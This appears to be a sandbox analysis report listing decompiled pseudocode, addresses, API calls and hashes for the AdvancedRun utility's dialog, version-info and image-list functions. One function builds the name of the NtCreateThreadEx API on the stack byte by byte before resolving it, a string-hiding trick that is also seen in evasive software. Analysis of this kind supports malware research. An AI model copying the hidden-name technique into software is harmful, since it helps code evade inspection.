							_push(L"Exception %8.8X at address %8.8X in module %s\r\nRegisters: \r\nEAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8X\r\nESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8X\r\nEIP=%8.8X\r\nStack Data: %s\r\nCode Data: %s\r\n");
							_push(0x800);
							_push( &_v9772);
							L0040B1EC();
							SetDlgItemTextW(_a4, 0x3ea,  &_v9772);
							SetFocus(GetDlgItem(_a4, 0x3ea));
							L21:
							return 0;
						}
						goto L17;
					}
				}
				if(_t45 == 1) {
					_t130 = _a12;
					if(_t130 >> 0x10 == 0) {
						if(_t130 == 3) {
							_t94 = GetDlgItem(_a4, 0x3ea);
							_a4 = _t94;
							SendMessageW(_t94, 0xb1, 0, 0xffff);
							SendMessageW(_a4, 0x301, 0, 0);
							SendMessageW(_a4, 0xb1, 0, 0);
						}
					}
				}
				goto L21;
			}































                                                                  0x00408ae3
                                                                  0x00408aeb
                                                                  0x00408af3
                                                                  0x00408b76
                                                                  0x00408b8a
                                                                  0x00408b91
                                                                  0x00408b98
                                                                  0x00408bb1
                                                                  0x00408bb3
                                                                  0x00408bc6
                                                                  0x00408bcc
                                                                  0x00408bda
                                                                  0x00408be0
                                                                  0x00408bf3
                                                                  0x00408bfa
                                                                  0x00408c0b
                                                                  0x00408c12
                                                                  0x00408c17
                                                                  0x00408c1a
                                                                  0x00408c2c
                                                                  0x00408c39
                                                                  0x00408c3d
                                                                  0x00408c3f
                                                                  0x00408c41
                                                                  0x00408c52
                                                                  0x00408c58
                                                                  0x00408c58
                                                                  0x00408c6f
                                                                  0x00408c71
                                                                  0x00408c73
                                                                  0x00408c83
                                                                  0x00408c89
                                                                  0x00408c89
                                                                  0x00408c8a
                                                                  0x00408c8f
                                                                  0x00408c91
                                                                  0x00408c9a
                                                                  0x00408c93
                                                                  0x00408c93
                                                                  0x00408c93
                                                                  0x00408c9f
                                                                  0x00408ca5
                                                                  0x00408caf
                                                                  0x00408cbc
                                                                  0x00408cc2
                                                                  0x00408cc7
                                                                  0x00408ccd
                                                                  0x00408cd0
                                                                  0x00408cd6
                                                                  0x00408cd7
                                                                  0x00408cd8
                                                                  0x00408cde
                                                                  0x00408ce3
                                                                  0x00408ceb
                                                                  0x00408cfe
                                                                  0x00408d03
                                                                  0x00408d06
                                                                  0x00408d0c
                                                                  0x00408d21
                                                                  0x00408d27
                                                                  0x00408d0c
                                                                  0x00000000
                                                                  0x00408ca7
                                                                  0x00408ca7
                                                                  0x00408cad
                                                                  0x00408d28
                                                                  0x00408d2e
                                                                  0x00408d35
                                                                  0x00408d36
                                                                  0x00408d42
                                                                  0x00408d48
                                                                  0x00408d4e
                                                                  0x00408d54
                                                                  0x00408d5a
                                                                  0x00408d60
                                                                  0x00408d66
                                                                  0x00408d6c
                                                                  0x00408d72
                                                                  0x00408d73
                                                                  0x00408d7f
                                                                  0x00408d85
                                                                  0x00408d8a
                                                                  0x00408d8f
                                                                  0x00408d90
                                                                  0x00408da8
                                                                  0x00408db9
                                                                  0x00408dbf
                                                                  0x00408dc5
                                                                  0x00408dc5
                                                                  0x00000000
                                                                  0x00408cad
                                                                  0x00408ca5
                                                                  0x00408af6
                                                                  0x00408afc
                                                                  0x00408b07
                                                                  0x00408b2a
                                                                  0x00408b38
                                                                  0x00408b53
                                                                  0x00408b56
                                                                  0x00408b62
                                                                  0x00408b6a
                                                                  0x00408b6a
                                                                  0x00408b2a
                                                                  0x00408b07
                                                                  0x00000000

                                                                  APIs
                                                                  Strings
                                                                  • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00408D85
                                                                  • {Unknown}, xrefs: 00408BA5
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                                                  • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                                                  • API String ID: 4111938811-1819279800
                                                                  • Opcode ID: da6163a693f44e98dc338dc238bd85c57536ed619285caa4b2ce51e2a39adb2b
                                                                  • Instruction ID: 89cdabe1f300c5598f457b205db6f7bf21b56caa474a1127ebd0a37068e91017
                                                                  • Opcode Fuzzy Hash: da6163a693f44e98dc338dc238bd85c57536ed619285caa4b2ce51e2a39adb2b
                                                                  • Instruction Fuzzy Hash: FD7184B280021DBEDB219B51DD85EDB377CEF08354F0444BAFA08B6191DB799E848F68
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0040B04D, Relevance: 33.4, APIs: 8, Strings: 11, Instructions: 139COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 82%
                                                                  			E0040B04D(intOrPtr* __edi, short* _a4) {
				int _v8;
				void* _v12;
				void* _v16;
				int _v20;
				long _v60;
				char _v572;
				void* __esi;
				int _t47;
				void* _t50;
				signed short* _t76;
				void* _t81;
				void* _t84;
				intOrPtr* _t96;
				int _t97;

				_t96 = __edi;
				_t97 = 0;
				_v20 = 0;
				_t47 = GetFileVersionInfoSizeW(_a4,  &_v20);
				_v8 = _t47;
				if(_t47 > 0) {
					_t50 = E00405AA7(__edi);
					_push(_v8);
					L0040B26C();
					_t84 = _t50;
					GetFileVersionInfoW(_a4, 0, _v8, _t84);
					if(VerQueryValueW(_t84, "\\",  &_v12,  &_v8) != 0) {
						_t81 = _v12;
						_t11 = _t81 + 0x30; // 0x4d46e853
						 *((intOrPtr*)(__edi + 4)) =  *_t11;
						_t13 = _t81 + 8; // 0x8d50ffff
						 *__edi =  *_t13;
						_t14 = _t81 + 0x14; // 0x5900004d
						 *((intOrPtr*)(__edi + 0xc)) =  *_t14;
						_t16 = _t81 + 0x10; // 0x65e850ff
						 *((intOrPtr*)(__edi + 8)) =  *_t16;
						_t18 = _t81 + 0x24; // 0xf4680000
						 *((intOrPtr*)(__edi + 0x10)) =  *_t18;
						_t20 = _t81 + 0x28; // 0xbb0040cd
						 *((intOrPtr*)(__edi + 0x14)) =  *_t20;
					}
					if(VerQueryValueW(_t84, L"\\VarFileInfo\\Translation",  &_v16,  &_v8) == 0) {
						L5:
						wcscpy( &_v60, L"040904E4");
					} else {
						_t76 = _v16;
						_push(_t76[1] & 0x0000ffff);
						_push( *_t76 & 0x0000ffff);
						_push(L"%4.4X%4.4X");
						_push(0x14);
						_push( &_v60);
						L0040B1EC();
						if(E0040AFBE( &_v572, _t84,  &_v60, 0x40c4e8) == 0) {
							goto L5;
						}
					}
					E0040AFBE(_t96 + 0x18, _t84,  &_v60, L"ProductName");
					E0040AFBE(_t96 + 0x218, _t84,  &_v60, L"FileDescription");
					E0040AFBE(_t96 + 0x418, _t84,  &_v60, L"FileVersion");
					E0040AFBE(_t96 + 0x618, _t84,  &_v60, L"ProductVersion");
					E0040AFBE(_t96 + 0x818, _t84,  &_v60, L"CompanyName");
					E0040AFBE(_t96 + 0xa18, _t84,  &_v60, L"InternalName");
					E0040AFBE(_t96 + 0xc18, _t84,  &_v60, L"LegalCopyright");
					E0040AFBE(_t96 + 0xe18, _t84,  &_v60, L"OriginalFileName");
					_push(_t84);
					_t97 = 1;
					L0040B272();
				}
				return _t97;
			}

















                                                                  0x0040b04d
                                                                  0x0040b05e
                                                                  0x0040b060
                                                                  0x0040b063
                                                                  0x0040b06a
                                                                  0x0040b06d
                                                                  0x0040b076
                                                                  0x0040b07b
                                                                  0x0040b07e
                                                                  0x0040b084
                                                                  0x0040b08e
                                                                  0x0040b0a8
                                                                  0x0040b0aa
                                                                  0x0040b0ad
                                                                  0x0040b0b0
                                                                  0x0040b0b3
                                                                  0x0040b0b6
                                                                  0x0040b0b8
                                                                  0x0040b0bb
                                                                  0x0040b0be
                                                                  0x0040b0c1
                                                                  0x0040b0c4
                                                                  0x0040b0c7
                                                                  0x0040b0ca
                                                                  0x0040b0cd
                                                                  0x0040b0cd
                                                                  0x0040b0e5
                                                                  0x0040b11f
                                                                  0x0040b128
                                                                  0x0040b0e7
                                                                  0x0040b0e7
                                                                  0x0040b0f1
                                                                  0x0040b0f2
                                                                  0x0040b0f3
                                                                  0x0040b0fb
                                                                  0x0040b0fd
                                                                  0x0040b0fe
                                                                  0x0040b11d
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x0040b11d
                                                                  0x0040b13c
                                                                  0x0040b151
                                                                  0x0040b166
                                                                  0x0040b17b
                                                                  0x0040b190
                                                                  0x0040b1a5
                                                                  0x0040b1ba
                                                                  0x0040b1cf
                                                                  0x0040b1d6
                                                                  0x0040b1d7
                                                                  0x0040b1d8
                                                                  0x0040b1de
                                                                  0x0040b1e3

                                                                  APIs
                                                                  • GetFileVersionInfoSizeW.VERSION(004064D2,?,00000000), ref: 0040B063
                                                                  • ??2@YAPAXI@Z.MSVCRT ref: 0040B07E
                                                                  • GetFileVersionInfoW.VERSION(004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B08E
                                                                  • VerQueryValueW.VERSION(00000000,0040CD2C,004064D2,?,004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B0A1
                                                                  • VerQueryValueW.VERSION(00000000,\VarFileInfo\Translation,?,?,00000000,0040CD2C,004064D2,?,004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B0DE
                                                                  • _snwprintf.MSVCRT ref: 0040B0FE
                                                                  • wcscpy.MSVCRT ref: 0040B128
                                                                  • ??3@YAXPAX@Z.MSVCRT ref: 0040B1D8
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: FileInfoQueryValueVersion$??2@??3@Size_snwprintfwcscpy
                                                                  • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                                                                  • API String ID: 1223191525-1542517562
                                                                  • Opcode ID: 7d0a25dbe63dd51685ec4fd467e5617a4705a8ce8e8c15efb6301eb2ec3eaad9
                                                                  • Instruction ID: 283451b663653e95218ba9e6ce5340ec929c4f2fba7a9b8c11281d5ea0e9195a
                                                                  • Opcode Fuzzy Hash: 7d0a25dbe63dd51685ec4fd467e5617a4705a8ce8e8c15efb6301eb2ec3eaad9
                                                                  • Instruction Fuzzy Hash: E34144B2940219BAC704EBA5DD41DDEB7BDEF08704F100177B905B3181DB78AA59CBD8
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0040A1EF, Relevance: 33.3, APIs: 2, Strings: 17, Instructions: 47libraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 76%
                                                                  			E0040A1EF(struct HINSTANCE__** __esi) {
				char _v8;
				char _v9;
				char _v10;
				char _v11;
				char _v12;
				char _v13;
				char _v14;
				char _v15;
				char _v16;
				char _v17;
				char _v18;
				char _v19;
				char _v20;
				char _v21;
				char _v22;
				char _v23;
				char _v24;
				struct HINSTANCE__* _t27;

				if( *__esi != 0) {
					L3:
					return 1;
				}
				_t27 = LoadLibraryW(L"ntdll.dll");
				 *__esi = _t27;
				if(_t27 != 0) {
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosw");
					asm("stosb");
					_v24 = 0x4e;
					_v23 = 0x74;
					_v13 = 0x65;
					_v12 = 0x61;
					_v18 = 0x74;
					_v17 = 0x65;
					_v22 = 0x43;
					_v14 = 0x72;
					_v11 = 0x64;
					_v21 = 0x72;
					_v10 = 0x45;
					_v9 = 0x78;
					_v20 = 0x65;
					_v19 = 0x61;
					_v16 = 0x54;
					_v15 = 0x68;
					_v8 = 0;
					__esi[1] = GetProcAddress(_t27,  &_v24);
					goto L3;
				}
				return 0;
			}





















                                                                  0x0040a1f8
                                                                  0x0040a26d
                                                                  0x00000000
                                                                  0x0040a26f
                                                                  0x0040a205
                                                                  0x0040a20b
                                                                  0x0040a20d
                                                                  0x0040a213
                                                                  0x0040a214
                                                                  0x0040a215
                                                                  0x0040a216
                                                                  0x0040a217
                                                                  0x0040a219
                                                                  0x0040a21f
                                                                  0x0040a223
                                                                  0x0040a227
                                                                  0x0040a22b
                                                                  0x0040a22f
                                                                  0x0040a233
                                                                  0x0040a237
                                                                  0x0040a23b
                                                                  0x0040a23f
                                                                  0x0040a243
                                                                  0x0040a247
                                                                  0x0040a24b
                                                                  0x0040a24f
                                                                  0x0040a253
                                                                  0x0040a257
                                                                  0x0040a25b
                                                                  0x0040a25f
                                                                  0x0040a269
                                                                  0x00000000
                                                                  0x0040a26c
                                                                  0x0040a271

                                                                  APIs
                                                                  • LoadLibraryW.KERNEL32(ntdll.dll,?,?,?,?,0040A2A4), ref: 0040A1FF
                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 0040A263
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: AddressLibraryLoadProc
                                                                  • String ID: C$E$N$T$a$a$d$e$e$e$h$ntdll.dll$r$r$t$t$x
                                                                  • API String ID: 2574300362-1257427173
                                                                  • Opcode ID: 7c4b767998ad850fb5a7cf24f594afd5e084a11fa120f3cae330cd392d2e2909
                                                                  • Instruction ID: 28a3addb3bc40b583479f690f9d6e65064931713b616a12c977b5f47a4008353
                                                                  • Opcode Fuzzy Hash: 7c4b767998ad850fb5a7cf24f594afd5e084a11fa120f3cae330cd392d2e2909
                                                                  • Instruction Fuzzy Hash: 08110A2090C6C9EDEB12C7FCC40879EBEF15B26709F0881ECC585B6292C6BA5758C776
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00407F8D, Relevance: 33.1, APIs: 22, Instructions: 137windowCOMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 63%
                                                                  			E00407F8D(void* __eax) {
				struct _SHFILEINFOW _v692;
				void _v1214;
				short _v1216;
				void* _v1244;
				void* _v1248;
				void* _v1252;
				void* _v1256;
				void* _v1268;
				void* _t37;
				long _t38;
				long _t46;
				long _t48;
				long _t58;
				void* _t62;
				intOrPtr* _t64;

				_t64 = ImageList_Create;
				_t62 = __eax;
				if( *((intOrPtr*)(__eax + 0x2b4)) != 0) {
					if( *((intOrPtr*)(__eax + 0x2bc)) == 0) {
						_t48 = ImageList_Create(0x10, 0x10, 0x19, 1, 1);
						 *(_t62 + 0x2a8) = _t48;
						__imp__ImageList_SetImageCount(_t48, 0);
						_push( *(_t62 + 0x2a8));
					} else {
						_v692.hIcon = 0;
						memset( &(_v692.iIcon), 0, 0x2b0);
						_v1216 = 0;
						memset( &_v1214, 0, 0x208);
						GetWindowsDirectoryW( &_v1216, 0x104);
						_t58 = SHGetFileInfoW( &_v1216, 0,  &_v692, 0x2b4, 0x4001);
						 *(_t62 + 0x2a8) = _t58;
						_push(_t58);
					}
					SendMessageW( *(_t62 + 0x2a0), 0x1003, 1, ??);
				}
				if( *((intOrPtr*)(_t62 + 0x2b8)) != 0) {
					_t46 =  *_t64(0x20, 0x20, 0x19, 1, 1);
					 *(_t62 + 0x2ac) = _t46;
					__imp__ImageList_SetImageCount(_t46, 0);
					SendMessageW( *(_t62 + 0x2a0), 0x1003, 0,  *(_t62 + 0x2ac));
				}
				 *(_t62 + 0x2a4) =  *_t64(0x10, 0x10, 0x19, 1, 1);
				_v1248 = LoadImageW(GetModuleHandleW(0), 0x85, 0, 0x10, 0x10, 0x1000);
				_t37 = LoadImageW(GetModuleHandleW(0), 0x86, 0, 0x10, 0x10, 0x1000);
				_v1244 = _t37;
				__imp__ImageList_SetImageCount( *(_t62 + 0x2a4), 0);
				_t38 = GetSysColor(0xf);
				_v1248 = _t38;
				ImageList_AddMasked( *(_t62 + 0x2a4), _v1256, _t38);
				ImageList_AddMasked( *(_t62 + 0x2a4), _v1252, _v1248);
				DeleteObject(_v1268);
				DeleteObject(_v1268);
				return SendMessageW(E0040331D( *(_t62 + 0x2a0)), 0x1208, 0,  *(_t62 + 0x2a4));
			}


















                                                                  0x00407f9b
                                                                  0x00407fa3
                                                                  0x00407fad
                                                                  0x00407fb9
                                                                  0x0040802e
                                                                  0x00408032
                                                                  0x00408038
                                                                  0x0040803e
                                                                  0x00407fbb
                                                                  0x00407fc9
                                                                  0x00407fd0
                                                                  0x00407fe0
                                                                  0x00407fe5
                                                                  0x00407ff7
                                                                  0x00408015
                                                                  0x0040801b
                                                                  0x00408021
                                                                  0x00408021
                                                                  0x00408051
                                                                  0x00408051
                                                                  0x00408059
                                                                  0x00408065
                                                                  0x00408069
                                                                  0x0040806f
                                                                  0x00408087
                                                                  0x00408087
                                                                  0x0040809c
                                                                  0x004080bb
                                                                  0x004080d1
                                                                  0x004080de
                                                                  0x004080e2
                                                                  0x004080ea
                                                                  0x004080fb
                                                                  0x00408105
                                                                  0x00408115
                                                                  0x00408121
                                                                  0x00408127
                                                                  0x00408150

                                                                  APIs
                                                                  • memset.MSVCRT ref: 00407FD0
                                                                  • memset.MSVCRT ref: 00407FE5
                                                                  • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00407FF7
                                                                  • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 00408015
                                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001), ref: 0040802E
                                                                  • ImageList_SetImageCount.COMCTL32(00000000,00000000), ref: 00408038
                                                                  • SendMessageW.USER32(?,00001003,00000001,?), ref: 00408051
                                                                  • ImageList_Create.COMCTL32(00000020,00000020,00000019,00000001,00000001), ref: 00408065
                                                                  • ImageList_SetImageCount.COMCTL32(00000000,00000000), ref: 0040806F
                                                                  • SendMessageW.USER32(?,00001003,00000000,?), ref: 00408087
                                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001), ref: 00408093
                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 004080A2
                                                                  • LoadImageW.USER32 ref: 004080B4
                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 004080BF
                                                                  • LoadImageW.USER32 ref: 004080D1
                                                                  • ImageList_SetImageCount.COMCTL32(?,00000000), ref: 004080E2
                                                                  • GetSysColor.USER32(0000000F), ref: 004080EA
                                                                  • ImageList_AddMasked.COMCTL32(?,00000000,00000000), ref: 00408105
                                                                  • ImageList_AddMasked.COMCTL32(?,?,?), ref: 00408115
                                                                  • DeleteObject.GDI32(?), ref: 00408121
                                                                  • DeleteObject.GDI32(?), ref: 00408127
                                                                  • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 00408144
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: Image$List_$CountCreateMessageSend$DeleteHandleLoadMaskedModuleObjectmemset$ColorDirectoryFileInfoWindows
                                                                  • String ID:
                                                                  • API String ID: 304928396-0
                                                                  • Opcode ID: d4ab9f05862d1af7c7dd0e0dd7fd39e91fe05cdd650fdb134c44776c28691368
                                                                  • Instruction ID: fc02d650de5297a4f4a3b2912da131a5170d4a501b91b7a2a94f7b4638737e48
                                                                  • Opcode Fuzzy Hash: d4ab9f05862d1af7c7dd0e0dd7fd39e91fe05cdd650fdb134c44776c28691368
                                                                  • Instruction Fuzzy Hash: 8F418971640304FFE6306B61DD8AF977BACFF89B00F00092DB795A51D1DAB55450DB29
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0040AE90, Relevance: 31.6, APIs: 12, Strings: 6, Instructions: 103COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 69%
                                                                  			E0040AE90(void* __esi, wchar_t* _a4, wchar_t* _a8) {
				int _v8;
				void _v518;
				long _v520;
				void _v1030;
				char _v1032;
				intOrPtr _t32;
				wchar_t* _t57;
				void* _t58;
				void* _t59;
				void* _t60;

				_t58 = __esi;
				_v520 = 0;
				memset( &_v518, 0, 0x1fc);
				_v1032 = 0;
				memset( &_v1030, 0, 0x1fc);
				_t60 = _t59 + 0x18;
				_v8 = 1;
				if( *((intOrPtr*)(__esi + 4)) == 0xffffffff &&  *((intOrPtr*)(__esi + 8)) <= 0) {
					_v8 = 0;
				}
				_t57 = _a4;
				 *_t57 = 0;
				if(_v8 != 0) {
					wcscpy(_t57, L"<font");
					_t32 =  *((intOrPtr*)(_t58 + 8));
					if(_t32 > 0) {
						_push(_t32);
						_push(L" size=\"%d\"");
						_push(0xff);
						_push( &_v520);
						L0040B1EC();
						wcscat(_t57,  &_v520);
						_t60 = _t60 + 0x18;
					}
					_t33 =  *((intOrPtr*)(_t58 + 4));
					if( *((intOrPtr*)(_t58 + 4)) != 0xffffffff) {
						_push(E0040ADC0(_t33,  &_v1032));
						_push(L" color=\"#%s\"");
						_push(0xff);
						_push( &_v520);
						L0040B1EC();
						wcscat(_t57,  &_v520);
					}
					wcscat(_t57, ">");
				}
				if( *((intOrPtr*)(_t58 + 0xc)) != 0) {
					wcscat(_t57, L"<b>");
				}
				wcscat(_t57, _a8);
				if( *((intOrPtr*)(_t58 + 0xc)) != 0) {
					wcscat(_t57, L"</b>");
				}
				if(_v8 != 0) {
					wcscat(_t57, L"</font>");
				}
				return _t57;
			}













                                                                  0x0040ae90
                                                                  0x0040aeab
                                                                  0x0040aeb2
                                                                  0x0040aec0
                                                                  0x0040aec7
                                                                  0x0040aecc
                                                                  0x0040aed3
                                                                  0x0040aeda
                                                                  0x0040aee1
                                                                  0x0040aee1
                                                                  0x0040aee7
                                                                  0x0040aeea
                                                                  0x0040aeed
                                                                  0x0040aef9
                                                                  0x0040aefe
                                                                  0x0040af05
                                                                  0x0040af07
                                                                  0x0040af08
                                                                  0x0040af13
                                                                  0x0040af18
                                                                  0x0040af19
                                                                  0x0040af26
                                                                  0x0040af2b
                                                                  0x0040af2b
                                                                  0x0040af2e
                                                                  0x0040af34
                                                                  0x0040af43
                                                                  0x0040af44
                                                                  0x0040af4f
                                                                  0x0040af54
                                                                  0x0040af55
                                                                  0x0040af62
                                                                  0x0040af67
                                                                  0x0040af70
                                                                  0x0040af76
                                                                  0x0040af7a
                                                                  0x0040af82
                                                                  0x0040af88
                                                                  0x0040af8d
                                                                  0x0040af97
                                                                  0x0040af9f
                                                                  0x0040afa5
                                                                  0x0040afa9
                                                                  0x0040afb1
                                                                  0x0040afb7
                                                                  0x0040afbd

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: wcscat$_snwprintfmemset$wcscpy
                                                                  • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                  • API String ID: 3143752011-1996832678
                                                                  • Opcode ID: 330f77f369881cb7aaffb2d4d29cef926f955dd174757b27785871b236def110
                                                                  • Instruction ID: 2e7f7f44a8c08f278b605cd2082ab28bfbf3198b566a778c3f72e8233e5ba29a
                                                                  • Opcode Fuzzy Hash: 330f77f369881cb7aaffb2d4d29cef926f955dd174757b27785871b236def110
                                                                  • Instruction Fuzzy Hash: 2531C6B2904306A9D720EAA59D86E7E73BCDF40714F10807FF214B61C2DB7C9944D69D
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00403C03, Relevance: 30.2, APIs: 20, Instructions: 235windowCOMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 97%
                                                                  			E00403C03(void* __eflags) {
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* _t88;
				void* _t108;
				void* _t113;
				void* _t119;
				void* _t121;
				void* _t122;
				void* _t123;
				intOrPtr* _t124;
				void* _t134;

				_t113 = _t108;
				E00403B3C(_t113);
				E00403B16(_t113);
				DragAcceptFiles( *(_t113 + 0x10), 1);
				 *0x40f2f0 = SetWindowLongW(GetDlgItem( *(_t113 + 0x10), 0x3fd), 0xfffffffc, E00403A73);
				E00402DDD( *(_t113 + 0x10), _t113 + 0x40);
				 *(_t124 + 0x14) = LoadImageW(GetModuleHandleW(0), 0x65, 1, 0x10, 0x10, 0);
				 *((intOrPtr*)(_t124 + 0x24)) = LoadImageW(GetModuleHandleW(0), 0x65, 1, 0x20, 0x20, 0);
				SendMessageW( *(_t113 + 0x10), 0x80, 0,  *(_t124 + 0x10));
				SendMessageW( *(_t113 + 0x10), 0x80, 1,  *(_t124 + 0x14));
				E0040AD85(GetDlgItem( *(_t113 + 0x10), 0x402));
				 *_t124 = 0x3ea;
				E0040AD85(GetDlgItem(??, ??));
				 *_t124 = 0x3f1;
				_t116 = GetDlgItem( *(_t113 + 0x10),  *(_t113 + 0x10));
				E004049D9(_t49, E00405B81(0x259), 0x20);
				E004049D9(_t49, E00405B81(0x25a), 0x40);
				E004049D9(_t116, E00405B81(0x25b), 0x80);
				E004049D9(_t116, E00405B81(0x25c), 0x100);
				E004049D9(_t116, E00405B81(0x25d), 0x4000);
				E004049D9(_t116, E00405B81(0x25e), 0x8000);
				_t117 = GetDlgItem( *(_t113 + 0x10), 0x3f5);
				E004049D9(_t62, E00405B81(0x26c), 0);
				E004049D9(_t62, E00405B81(0x26d), 1);
				E004049D9(_t117, E00405B81(0x26e), 2);
				E004049D9(_t117, E00405B81(0x26f), 3);
				_t134 = _t124 + 0x78;
				 *((intOrPtr*)(_t134 + 0x10)) = GetDlgItem( *(_t113 + 0x10), 0x400);
				_t119 = 1;
				do {
					_t17 = _t119 + 0x280; // 0x281
					E004049D9( *((intOrPtr*)(_t134 + 0x18)), E00405B81(_t17), _t119);
					_t134 = _t134 + 0xc;
					_t119 = _t119 + 1;
				} while (_t119 <= 9);
				 *((intOrPtr*)(_t134 + 0x10)) = GetDlgItem( *(_t113 + 0x10), 0x3fc);
				_t121 = 1;
				do {
					_t21 = _t121 + 0x294; // 0x295
					E004049D9( *((intOrPtr*)(_t134 + 0x18)), E00405B81(_t21), _t121);
					_t134 = _t134 + 0xc;
					_t121 = _t121 + 1;
				} while (_t121 <= 3);
				 *((intOrPtr*)(_t134 + 0x10)) = GetDlgItem( *(_t113 + 0x10), 0x407);
				_t122 = 0;
				do {
					_t25 = _t122 + 0x2bc; // 0x2bc
					E004049D9( *((intOrPtr*)(_t134 + 0x18)), E00405B81(_t25), _t122);
					_t134 = _t134 + 0xc;
					_t122 = _t122 + 1;
				} while (_t122 <= 0xd);
				 *((intOrPtr*)(_t134 + 0x10)) = GetDlgItem( *(_t113 + 0x10), 0x40c);
				_t123 = 0;
				do {
					_t29 = _t123 + 0x2ee; // 0x2ee
					E004049D9( *((intOrPtr*)(_t134 + 0x18)), E00405B81(_t29), _t123);
					_t134 = _t134 + 0xc;
					_t123 = _t123 + 1;
					_t143 = _t123 - 3;
				} while (_t123 < 3);
				SendDlgItemMessageW( *(_t113 + 0x10), 0x3fd, 0xc5, 0, 0);
